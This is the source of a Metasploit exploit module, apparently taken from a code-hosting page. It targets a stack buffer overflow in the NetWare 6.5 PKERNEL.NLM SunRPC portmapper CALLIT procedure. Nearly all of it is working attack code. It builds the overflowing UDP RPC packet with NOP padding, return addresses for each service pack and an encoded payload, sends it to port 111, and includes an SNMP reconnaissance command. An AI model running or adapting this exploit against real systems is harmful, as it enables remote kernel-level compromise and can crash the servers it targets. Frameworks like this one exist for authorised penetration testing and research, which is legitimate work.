Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
16
        PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
17
        The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
18
        cause the operating system to reboot.
19
      },
20
      'Author'         => [ 'pahtzo', ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          # There is no CVE for this vulnerability
25
          [ 'BID', '36564' ],
26
          [ 'OSVDB', '58447' ],
27
          [ 'ZDI', '09-067' ],
28
        ],
29
      'Privileged'     => true,
30
      'Payload'        =>
31
        {
32
          'Space'    => 2020,
33
        },
34
      'Platform'       => 'netware',
35
      'Targets'        =>
36
        [
37
          # NetWare SP and PKERNEL.NLM version can be found in SNMP:
38
          # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
39
          # sysDescr.0 = STRING: Novell NetWare 5.70.08  October 3, 2008
40
          # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM  v15.01  (20081014)"
41
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
42
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
43
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
44
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
45
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
46
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
47
          [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
48
        ],
49

50
      'DisclosureDate' => '2009-09-30'))
51

52
    register_options([Opt::RPORT(111)])
53
  end
54

55
  def exploit
56
    connect_udp
57

58
    buf =  [rand(0xffffffff)].pack('N') # XID
59
    buf << [0].pack('N')                # Message Type: Call (0)
60
    buf << [2].pack('N')                # RPC Version: 2
61
    buf << [100000].pack('N')           # Program: Portmap (100000)
62
    buf << [2].pack('N')                # Program Version: 2
63
    buf << [5].pack('N')                # Procedure: CALLIT (5)
64
    buf << [0].pack('N')                # Credentials AUTH_NULL (0)
65
    buf << [0].pack('N')                # Length: 0
66
    buf << [0].pack('N')                # Verifier AUTH_NULL (0)
67
    buf << [0].pack('N')                # Length: 0
68
    buf << [0].pack('N')                # Program: Unknown (0)
69
    buf << [1].pack('N')                # Version: 1
70
    buf << [1].pack('N')                # Procedure: proc-1 (1)
71
    buf << [4097].pack('N')             # Arguments: <DATA> length: 4097
72

73
    buf << make_nops(2072)              # fill to ret
74
    buf << [target.ret].pack('V')       # addr. of push esp - ret
75
    buf << payload.encoded              #
76

77
#        print_status("payload space #{payload_space()}...")
78
#        print_status("payload len #{payload.encoded.length}...")
79
#        print_status("total buf len #{buf.length}...")
80

81
    print_status("Trying target #{target.name}...")
82

83
    udp_sock.put(buf)
84
    handler
85
    disconnect_udp
86
  end
87
end
88

89